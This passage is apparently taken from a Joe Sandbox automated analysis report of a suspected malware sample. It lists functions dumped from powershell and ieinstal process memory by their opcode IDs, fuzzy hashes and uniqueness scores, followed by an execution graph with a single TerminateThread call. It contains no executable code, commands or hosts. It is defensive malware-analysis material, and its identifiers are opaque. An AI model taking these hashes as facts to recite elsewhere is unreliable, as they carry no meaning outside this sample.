                                                • Instruction Fuzzy Hash: 71529F31D0065ADFCB21DF64D8406DEB7B2FF89310F1186A9E549BB250EB30AA95CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08F6C8F0 Relevance: 3.0, Strings: 2, Instructions: 550COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$@
                                                • API String ID: 0-1136454570
                                                • Opcode ID: 0d43cf1ecc1853503db89cea8bb2cecd0bf634cd1e7ea29255f835789b30eaa3
                                                • Instruction ID: 2b203afed05bcf2bc4d3bc444784e8cc1acde6fe7e3d533c40c3cf7f903bd080
                                                • Opcode Fuzzy Hash: 0d43cf1ecc1853503db89cea8bb2cecd0bf634cd1e7ea29255f835789b30eaa3
                                                • Instruction Fuzzy Hash: 4012AB75F003048FDB24DBB4C5906AEB7F2AB88212F25862ED4969B754DF34E816CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0874B210 Relevance: 2.4, Strings: 1, Instructions: 1115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $}l
                                                • API String ID: 0-3398354306
                                                • Opcode ID: c9bfe1263b07b707a762f36d4773702c99a0870f2f490538db2fe334c068b688
                                                • Instruction ID: b299a9a588f7b0deddd699b433e8c55abd1ddf7d52ecf55b27347e77f07fa632
                                                • Opcode Fuzzy Hash: c9bfe1263b07b707a762f36d4773702c99a0870f2f490538db2fe334c068b688
                                                • Instruction Fuzzy Hash: 12B23734A042088FDB14DFA4D894BEEB7B2EF85305F1184A9C109AF795DB399D86CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08678129 Relevance: 2.3, Strings: 1, Instructions: 1097COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tP}l
                                                • API String ID: 0-1999695023
                                                • Opcode ID: 9b71d1f5cb9216507b653ee6a803f6948ede218b7f62563a8e7ed1bb0181298d
                                                • Instruction ID: 40e07c8eeab526f7b2b8c06429359e3ebd743b15b98036929459fe8a15aa9a5c
                                                • Opcode Fuzzy Hash: 9b71d1f5cb9216507b653ee6a803f6948ede218b7f62563a8e7ed1bb0181298d
                                                • Instruction Fuzzy Hash: AAB23B74A012189FDB65EFA4C894BDE77B2EF88305F1044EAD409AB350DF3A5E819F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08678138 Relevance: 2.3, Strings: 1, Instructions: 1089COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tP}l
                                                • API String ID: 0-1999695023
                                                • Opcode ID: 59d359b1129a09f5c2cf7ee0698b7b6fc00ef645980c7605ed5a35acfeaa8215
                                                • Instruction ID: d55f14f56a54384bd2f8c7467d747ea1c3e3e60f887f2c35163d101974145a4e
                                                • Opcode Fuzzy Hash: 59d359b1129a09f5c2cf7ee0698b7b6fc00ef645980c7605ed5a35acfeaa8215
                                                • Instruction Fuzzy Hash: D8B23B74A012189FDB65EFA4C894BDEB7B2EF88305F1044EAD409AB350DF3A5E819F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0874B1EF Relevance: 2.0, Strings: 1, Instructions: 715COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $}l
                                                • API String ID: 0-3398354306
                                                • Opcode ID: 1c320cb791a351aa0cef4d573c3d505c6737287965077d6977cd7d602729a4bc
                                                • Instruction ID: a2dd96f9a4c039bac51089f027a67c9160d8d0cbf0387c34e0a8434ab362693d
                                                • Opcode Fuzzy Hash: 1c320cb791a351aa0cef4d573c3d505c6737287965077d6977cd7d602729a4bc
                                                • Instruction Fuzzy Hash: FC623778A042189FDB24DFA4C890BDE77B2EF89300F1144A9D109AB795DF39AE85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 085EDB20 Relevance: .4, Instructions: 397COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 268d0430bb9e3878ab26b8f44e8f53cca64e1a51b20c7b3a609db320b8955efa
                                                • Instruction ID: 0cf7d30b4d147f13d3050d5d9f9b207452d8d5d3d6ed1f1bd2eb5ebcf2ed628a
                                                • Opcode Fuzzy Hash: 268d0430bb9e3878ab26b8f44e8f53cca64e1a51b20c7b3a609db320b8955efa
                                                • Instruction Fuzzy Hash: E8D1BF79B002148FDB18EBB8C850AAEB7B3EFC8211B15856DE406DB355DF35DC068BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F3C98 Relevance: .4, Instructions: 350COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15b056eea16f190debdfad083c46a6ac61a13601be9a6df74588dcdb3713f5a9
                                                • Instruction ID: c7598fcda5e285b70d34f2fcf74aea334fda8a737d4bb33590737ec5339afb29
                                                • Opcode Fuzzy Hash: 15b056eea16f190debdfad083c46a6ac61a13601be9a6df74588dcdb3713f5a9
                                                • Instruction Fuzzy Hash: 59C180747823447FF7166730EC52F2A3653ABC6B14F748469E701AF3D1D9B2A8868784
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F3C8A Relevance: .3, Instructions: 348COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9619bd14c775fcd13cdd05d242837d25949ba650e049a5ed3b1a5076d0a361f7
                                                • Instruction ID: e7f150c1d38fd88dfe772f83eeecfc8ab5955aa1ce1a1b52366aa132b47f33e2
                                                • Opcode Fuzzy Hash: 9619bd14c775fcd13cdd05d242837d25949ba650e049a5ed3b1a5076d0a361f7
                                                • Instruction Fuzzy Hash: CEC181747823447FF7166730EC52B2A3763ABC6B14F648469E701AF3D1D9B268868784
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 085E3798 Relevance: .2, Instructions: 217COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b4ed2f356d9766473dd2d388bcff7f94a2d309630bdc4a40c8d78a1d54b34b0
                                                • Instruction ID: 5b760d2c507330604403b6f43d978545d0f1a7e69426e77bebb0af9f41d9e733
                                                • Opcode Fuzzy Hash: 9b4ed2f356d9766473dd2d388bcff7f94a2d309630bdc4a40c8d78a1d54b34b0
                                                • Instruction Fuzzy Hash: 6B817B30B042859BDB19CFA5C8507EEBBB3BF84305F14846DE846AB395EB74D94ACB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:1
                                                Total number of Limit Nodes:0
                                                execution_graph 79 63e26d TerminateThread

                                                Callgraph

                                                Executed Functions

                                                Function 0063E26D Relevance: 1.5, APIs: 1, Instructions: 10threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 63e26d-63e289 TerminateThread
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.8454791006.0000000000630000.00000040.00000400.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_630000_ieinstal.jbxd
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: 44afa38f8e1ebdb2ea769f5f40b06a685890bdf2231cfaadeda5cd4dcfd7204a
                                                • Instruction ID: 15c4d3a731beb1d9c3e6be77de5a1846c92d149cf7f4b31ef804c75758a6f86a
                                                • Opcode Fuzzy Hash: 44afa38f8e1ebdb2ea769f5f40b06a685890bdf2231cfaadeda5cd4dcfd7204a
                                                • Instruction Fuzzy Hash: E4C09B5510170351E71419299DF77DE25532F551B1F5487348C6DDB0D5D77781855410
                                                Uniqueness

                                                Uniqueness Score: -1.00%